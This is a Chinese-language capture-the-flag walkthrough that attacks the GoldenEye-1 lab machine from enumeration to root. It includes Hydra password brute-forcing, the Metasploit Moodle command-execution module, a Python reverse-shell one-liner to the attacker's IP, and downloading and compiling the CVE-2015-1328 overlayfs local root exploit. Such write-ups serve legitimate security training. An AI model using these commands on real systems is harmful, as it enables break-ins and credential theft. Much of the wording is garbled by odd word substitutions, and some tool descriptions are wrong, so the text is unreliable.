靶机地点:https://www.vulnhub.com/entry/goldeneye-1,240/
靶机难度:中等(CTF)
目标:得到root权限&找到flag.txt
信息收集
- 收集目标ip
- nmap扫描到两个端口
- 尝试访问80端口
- 显示的文本提示了一条线索,它说进入到/sev-home/目次中。
- User: UNKNOWN
Naviagate to /sev-home/ to login
必要登录,开始罗列查找用户名暗码信息!
- 查看其页面源代码发现一个terminal.js文件
- 暗码信息
- //I encoded you p@ssword below...
- //
- //InvincibleHack3r
- 用户名信息
阅读提示可以猜测用户名和暗码可能为:Boris或Natalya
渗透过程
获得用户名和暗码:
- 通过暗码信息的收集发现这种编码是unicode的一种编码
- 猜测用户名为boris成功
step2
- 登录成功后获取到又一紧张信息
- POP3是一种发邮件的服务帮助中心_常见标题 (163.com)
- 继续对ip地点进行端口扫描查看pop3服务
- nmap -p- 192.168.177.129//全端口扫描
- nmap具体扫描上述55006,55007端口
- nmap -p-55006,55007 192.168.177.129 -sS -sV -T5 -A
- 验证了收集到的信息
6.通过Hydra暴力破解pop3服务
- Hydra暗码爆破工具使用教程图文教程(超具体)_hydra使用教程-CSDN博客
- echo -e 'natalya\nboris' > dayu.txt ---将两个用户名写入txt文本中
- hydra -L dayu.txt -P /usr/share/wordlists/fasttrack.txt 192.168.177.129 -s 55007 pop3
- #/usr/share/wordlists/fasttrack.txt 是一个常见的字典文件,通常被用于密码破解、渗透测试和安全审计。这个文件包含了许多常见的用户名、密码、常用短语和其他可能用于攻击的字符串列表。这些列表可以被安全专业人员用于测试系统的安全性,确认系统是否容易受到常见的口令攻击。
- 颠末2~5分钟等待,获得两组账号暗码
用户:boris 暗码:secret1!
用户:natalya 暗码:bird
- 通过NC登录pop3查看邮件信封内容罗列
- 查看boris的
- nc 192.168.177.129 55007 ---登录邮箱
user boris ---登录用户
pass secret1! ---登录暗码
list ---查看邮件数目
retr 1~3 ---查看邮件内容
读到的信息
- 查看natalya的
- nc 192.168.177.129 55007 ---登录邮箱
user natalya ---登录用户
pass bird ---登录暗码
list ---查看邮件数目
retr 1~3 ---查看邮件内容
- 读到的信息
在第二封邮件看到了另外一个用户名暗码,此服务器域名和网站,还要求我们在当地服务hosts中添加域名信息:
用户名:xenia
暗码:RCP90rulez!
域:severnaya-station.com
网址:severnaya-station.com/gnocertdir
我们现根据邮件提示添加当地区名:severnaya-station.com
- 设置当地HOSTS文件
gedit /etc/hosts
192.168.177.129 severnaya-station.com
step3
- 访问severnaya-station.com/gnocertdir
- 刚登陆界面我就看到了moodle,这是一个开源的CMS系统,继续点一点,发现要登陆,使用邮件获得的用户暗码进行登陆。
是的,Moodle 是一种开源的学习管理系统(LMS),而不是一种内容管理系统(CMS)。Moodle 主要用于创建在线学习平台,提供了丰富的讲授和学习工具,包罗课程管理、在线测验、资源分享、讨论论坛等功能。Moodle 的开源性子意味着用户可以免费获取、使用和定制它,同时还可以根据本身的需求扩展功能。
内容管理系统(CMS)通常用于创建和管理网站内容,例如WordPress、Joomla 和Drupal,而学习管理系统(LMS)则专注于教诲和培训范畴。Moodle 在教诲范畴非常受接待,许多学校、大学和培训机构都使用它来提供在线学习服务。
whatweb severnaya-station.com/gnocertdir ---指纹搜索也行
- 登录后,Home / ▶ My profile / ▶ Messages --->发现有一封邮件,内容发现用户名doak收集到又一有用的信息
- 又尝试用九头蛇爆破email username = doak的暗码
- echo doak > dayu.txt ---将用户名写入txt文本中
- hydra -L dayu.txt -P /usr/share/wordlists/fasttrack.txt 192.168.177.129 -s 55007 pop3
- #或者直接爆破doak这一个
- hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.177.129 -s 55007 pop3
- 成功获得暗码[pop3] host: 192.168.177.129 login: doak password: goat
- 登录doak用户罗列邮件信息
nc 192.168.177.129 55007 ---登录邮箱
user doak ---登录用户
pass goat ---登录暗码
list ---查看邮件数目
retr 1 ---查看邮件内容
step4
- 据上诉邮件消息说,为我们提供了更多登录根据以登录到应用程序。让我们尝试使用这些根据登录。
用户名:dr_doak
暗码:4England!
- 登录后发现
- Something juicy is located here: /dir007key/for-007.jpg
现在我们查看文件的内容,指出管理员根据已隐藏在映像文件中,让我们在浏览器中打开图像以查看其内容。
访问页面:severnaya-station.com/dir007key/for-007.jpg
下载到当地:
wget http://severnaya-station.com/dir007key/for-007.jpg
根据邮件提示让我们检查图片内容,下载图片后,我们可以使用:
binwalk(路由逆向分析工具)
exiftool(图虫)
strings(辨认动态库版本指令)
等查看jpg文件底层内容!
exiftool for-007.jpg
strings for-007.jpg
用以上下令都可以查看到base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ==
- 对上述base64编码隐藏信息解码得到:xWinter1995x!
- 又由2知道用户为admin,由此可以登录
- 成功用admin用户登录站点
step5
- 进去内容太多了,花了很多时间查看,图片红框显示和我前面使用dr_doak用户登陆邮箱发现的效果一致。
这是Moodle使用的2.2.3版本,搜索了网上的可用漏洞。
- google搜索:Moodle 2.2.3 exp poc
- Moodle 2.2.3 exp cve --> CVE-2013-3630 漏洞可利用! 29324
- 此版本有许多漏洞利用,由于我们必要在目标计算机上进行外壳访问,因此我选择使用远程代码执行(RCE)漏洞利用。
使用我们的神器:MSF
- msfconsole ---进入MSF框架攻击界面
- search moodle ---查找 moodle类型 攻击的模块
- use 1 ---调用0 exploit/multi/http/moodle_cmd_exec调用攻击脚本
- set username admin ---设置用户名:admin
- set password xWinter1995x! ---设置密码:xWinter1995x!
- set rhost severnaya-station.com ---设置:rhosts severnaya-station.com
- set targeturi /gnocertdir ---设置目录: /gnocertdir
- set payload cmd/unix/reverse ---设置payload:cmd/unix/reverse
- set lhost 192.168.177.128 ---设置:lhost 192.168.4.231(需要本地IP)
- exploit ----执行命令
- 当我们执行后发现无法成功,是由于对方必要修改执行PSpellShell
https://www.exploit-db.com/exploits/29324
's_editor_tinymce_spellengine' => 'PSpellShell',
- 成功,但交互shell不正常,有装python
- 执行tty,由于获得的权限无框架:执行
python -c 'import pty; pty.spawn("/bin/bash")' ---将shell进行tty
- 当地监听,用python反弹shell
- #python反弹shell
- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.177.128",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- 成功创建连接,但依然是不正常的shell
- python -c 'import pty; pty.spawn("/bin/bash")' ---将shell进行tty
step6提权获取flag
- 谷歌搜索:Linux ubuntu 3.13.0-32 exploit
获得exp版本:37292
CVE(CAN) ID: CVE-2015-1328
overlayfs文件系统是一种叠合式文件系统,实现了在底层文件系统上叠加另一个文件系统。Linux 内核3.18开始已经到场了对overlayfs的支持。Ubuntu Linux内核在更早的版本就已到场该支持。
Ubuntu Linux内核的overlayfs文件系统实现中存在一个权限检查漏洞,当地普通用户可以获取管理员权限。此漏洞影响全部现在官方支持的Ubuntu Linux版本,现在已经发布攻击代码,建议受影响用户尽快进行升级。
此漏洞源于overlayfs文件系统在上层文件系统目次中创建新文件时没有精确检查文件权限。它只检查了被修改文件的属主是否有权限在上层文件系统目次写入,导致当从底层文件系统目次中拷贝一个文件到上层文件系统目次时,文件属性也陪伴拷贝过去。假如Linux内核设置了CONFIG_USER_NS=y和FS_USERNS_MOUNT标记,将允许一个普通用户在低权限用户命名空间中mout一个overlayfs文件系统。当地普通用户可以利用该漏洞在敏感系统目次中创建新文件或读取敏感文件内容,从而提升到管理员权限。
- 当前靶机下没有gcc,只有cc
- kali搜索下:
searchsploit 37292 ---搜索kali当地的exp库中37292攻击脚本信息
cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/Desktop ---目次自行修改
- 这个靶场在罗列信息知道:
无法进行GCC编译,必要改下脚本为cc
gedit 37292.c ---文本打开
第143行将gcc改为cc ---编写下
- 然后在本机本目次下开启http服务:python -m http.server 8081
- 靶机上执行
cd /tmp
wget http://192.168.177.128:8081/37292.c ---wget下载http服务下的文件
- 成功下载后执行cc编译:
cc -o exp 37292.c ---C语言的CC代码编译点c文件
chmod +x exp ---编译成可执行文件,并赋权
./exp ---点杠执行
id ---查看现在权限
cat /root/.flag.txt ---读取root下的flag信息
568628e0d993b1973adc718237da6e93
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
